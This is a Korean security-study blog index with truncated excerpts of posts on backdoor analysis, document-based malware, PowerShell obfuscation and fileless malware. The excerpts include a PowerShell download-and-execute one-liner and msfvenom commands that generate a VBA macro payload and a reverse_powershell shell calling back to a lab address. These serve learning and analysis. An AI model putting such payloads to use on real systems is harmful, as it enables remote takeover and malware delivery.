목록Security (92)

wonder

정보보안 스터디 - 21주차 5일 - Volatility를 이용한 메모리 분석

☞ 백도어 실행 및 분석 백도어란 공격자가 정상적인 방법으로 직접적인 공격, 접근을 하지 못해 뒷문을 이용하는 방법입니다. 이것 역시 문서형 악성파일 > 파워쉘의 다운로더 등으로 배포와 실행되구요. 대략적인 통신 과정은 A프로세스 실행되게 되고 TCP 포트 번호를 리슨상태로 둡니다. 그리고 누가 tcp syn요청을 보내면 연결 후 쉘을 제공해 달라고 설정합니다. 장기적으로 레지스트리, 윈도우 서비스까지 (둘다) 등록하여 공격합니다. 백도어 소스코드는 다양한 언어로 만들어진 게 검색해보면 많을 겁니다. 누가 피해자측인지 공격자인지 확실히 알아야합니다. 일단 기본 정적 분석부터 진행하자면 wsock32.dll ws2_32.dll 소켓 통신하겠구나. send,listen socket - 소켓 생성 bind -..
Security/리버싱 2023. 3. 7. 10:04
정보보안 스터디 - 21주차 1일 - 문서형 악성파일

☞ 문서형 악성파일 최근 악성코드의 대부분은 파워쉘로 진행합니다. 근데 저도 원래 그랬지만 사용자는 파워쉘에 대해서 잘 모릅니다. 그렇기 때문에 아직도 잘 먹히는 이유입니다. 또한 실행파일자체로 들어가는 게 아니라 처음엔 파워쉘을 많이쓰고, exe 드롭퍼 계속낳는 방식입니다. 악성파일은 최근에 와서 신규 기술적인 부분이나 여러가지 접근은 하지만 본질적인 부분은 예전이랑 달라진게 없습니다. 악성파일 구조나 사용하는 방식은 비슷합니다. 매크로 기능, 스크립트가 들어갔다는 것만으로 백신은 그냥 위험하다고 잡습니다. ☞ VBA 매크로 언어 1) 쉽게말해 msfvenom을 사용하여 cmd > 시스템 파일(그림판)을 실행하는 것을 VBA매크로 코드로 만듭니다.(-f vba 형식) msfvenom -a x86 --p..
Security/리버싱 2023. 3. 4. 22:33
정보보안 스터디 - 21주차 1일 - 악성코드 난독화

오늘은 복습차원에서 다시 포스팅합니다. ☞ 파워쉘 난독화 분석을 방해하기 위해서 변경합니다. base64로 많이 하는데 디코드 되기 때문에 암호화가 아닙니다. PowerShell (New-Object Net.WebClient).DownloadFile('https://.tistory.com/ attachment/cfile7.uf@99DC973E5D30314E278FD2.exe', 'c:/putty.exe');IEX('c:/putty.exe'); 파워쉘 다운로드하는 동작입니다. 1) invoke-expression은 실행한다는 뜻입니다. 또는 shell.execution, start-process도 많이씁니다. > IEX로 바꿔 사용할 수 있기 때문에 System.Net.WebClient > system제외..
Security/리버싱 2023. 3. 4. 10:16
정보보안 스터디 - 21주차 2일 - 백도어 분석

오늘은 backdoor.exe에 대해서 분석해봤습니다. ☞ 백도어란 백도어란 뒷문이라는 뜻으로 정상적인 방법으로 접근하지 못하기 때문에 취약한 서비스 포트를 이용하거나 리슨상태로 만들어서 침투하는 것을 말합니다. 피해자 측에서 실행시켜 tcp 포트를 리슨상태로 만들고 그 포트에다가 공격자가 들어갈 수 있도록 공격자가 연결을 합니다. 그 후에는 파일dump라던지, 정보수집, 다운로더 및 악성파일을 집어넣는다던지 쉘을 장악하여 사용할 수 있는 것을 말합니다. (시스템 제어- 그래픽 제어 등) 이때까지 배운 reverse_tcp도 백도어라고 할 수 있습니다. 단발성으로 침투하는 것이 있고 / 레지스트리, 서비스, 시작프로그램 디렉토리 등록하고 잠입하여 쭉 영향을 끼치는 방식으로 나뉩니다. 테스트를 위해서 wi..
Security/리버싱 2023. 3. 3. 22:31
정보보안 스터디 - 20주차 6일 - 문서형 악성파일 상세연구2

☞ RTF 파일형식 워드패드로 되어있습니다. 워드패드는 워드 대용으로 옛날에 많이 사용했지만 요즘은 사용하지 않습니다. 메모장과의 차이점이 있다면 메모장은 절대적인 글자 속성이 없지만 워드패드는 색상, 폰드 등 저장할 수 있습니다. 또한 워드파일(doc)로도 저장이 가능합니다. 워드패드에서 ~ 하면 코드를 삽입할 수 있고 실행되는 것을 볼수 있습니다. ☞ OLE(object linking and embedding) 윈도우 응용 프로그램 간에 개체 연결 및 삽입 기능을 합니다. 예를 들어 문서에 도표/수식/그림 서식을 포함하는 기능입니다. MS office 2007 이전 버전에서 사용하는 파일 포맷이며, OLE 파일 내부는 FAT 파일시스템과 비슷한 구조를 갖고 있습니다. 윈도우에서의 파일 시스템은 요즘은..
Security/리버싱 2023. 3. 1. 13:39
정보보안 스터디 - 20주차 5일 - 문서형 악성파일, 난독화 방법

reverse_powershell 파워쉘을 실행할 수 있는 파일 형식(bat)으로 reverse_tcp 연결 하는 방법입니다. reverse_powershell 페이로드를 사용합니다. msfvenom -p cmd/windows/reverse_powershell \ lhost=192.168.2.50 \ lport=4444 > /root/Desktop/PowerShell-3.bat kali에서 만든 파일을 windows7 유저에게 어떤 방법으로든 전송해서 실행하게 만듭니다. 만들어진 bat 파일을 notepad++에서 열어 내용을 확인해보면 연결하는 socket 기능이 보입니다. Poweliks 파일리스 Poweliks 악성코드는 파일이 없는 악성코드, 즉 레지스트리에 등록되는 방식의 악성코드 입니다. 백신..
Security/리버싱 2023. 2. 28. 02:38
이전 Prev 1 2 3 4 ··· 16 Next 다음